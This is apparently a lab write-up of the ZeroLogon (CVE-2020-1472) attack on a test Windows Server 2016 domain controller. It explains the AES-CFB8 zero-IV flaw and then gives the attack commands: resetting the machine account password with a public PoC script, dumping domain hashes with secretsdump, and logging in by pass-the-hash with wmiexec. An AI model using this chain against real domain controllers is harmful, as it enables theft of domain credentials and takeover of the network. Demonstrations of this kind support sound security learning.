ZeroLogon Exploit

CVE-2020-1472, 6 Oct 2020

Introduction

CVE-2020-1472, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft released a patch (KB4565349) fixed in August 2020. This vulnerability was discovered by secure security researcher Tom Tervoor on 11 September 2020. A weakness point was found on the encryption Advanced Encryption Standard – Cipher Feed Back 8 bit , (AES-CFB8) that used at the MS-NRPC to encrypt the client credential with the "Client Challenge" during the third steps of MS-NRPC. ZeroLogon, affected all the windows servers that function as Active Directory domain controllers in enterprise networks.

The following diagram is the authentication handshake process of MS-NRPC, the attack happened on steps 3 on encrypting the client credential using the AES-CFB8.

Using the AES-CFB8 in MS-NRPC protocol has an issue with the Initialisation Vector (IV). The IV should be a random number, but MS-NRPC set a fixed IV of 16 bytes of zeros. Thus, if the client challenge set to all zeros, the probability of all zero encryption result is 1/256. It can easy to pass the step 4 validation. The attack details can be referenced to the Whitepaper by Tom Tervoor

Exploitation Demo

Many PoC exploits have been released (1, 2, 3, 4, 5, ... etc)

Target Environment

Host Name: FKCLAI-WIN2016 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 Domain: FKCLAI.local Logon Server: \\FKCLAI-WIN2016

Tools Setup

Using the RiskSense's ZeroLogon exploitation script with the latest updated of the impacket on this demo.

root@kclai:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
Cloning into 'zerologon'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
Unpacking objects: 100% (22/22), done.
root@kclai:~/Documents/ctf/expoit# 

Remove all impacket scripts

root@kclai:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
  erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
  erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
  erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
  erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
  ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
  gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
  guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
  keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
  libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
  libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
  libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
  libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0

get the latest impacket from the https://github.com/SecureAuthCorp/impacket.git

root@kclai:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18598, done.
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
Resolving deltas: 100% (14169/14169), done.

root@kclai:~/Documents/ctf/tools/win/impacket# python setup.py install
running install
running bdist_egg
running egg_info
creating impacket.egg-info
writing requirements to impacket.egg-info/requires.txt
writing impacket.egg-info/PKG-INFO
writing top-level names to impacket.egg-info/top_level.txt
writing dependency_links to impacket.egg-info/dependency_links.txt
writing manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no files found matching 'tests' under directory 'examples'
warning: no files found matching '*.txt' under directory 'examples'
writing manife
..
..
..
... dding ldapdomaindump 0.9.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for ldap3==2.5.1
Best match: ldap3 2.5.1
Adding ldap3 2.5.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for Flask==1.1.1
Best match: Flask 1.1.1
Adding Flask 1.1.1 to easy-install.pth file
Installing flask script to /usr/local/bin

Using /usr/lib/python3/dist-packages
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
root@kclai:~/Documents/ctf/tools/win/impacket# 

Start Exploit

python3 set_empty_pw.py fkclai-win2016 192.168.1.169

secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169

wmiexec.py fkclai/administrator@192.168.1.169 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

mimikatz Coding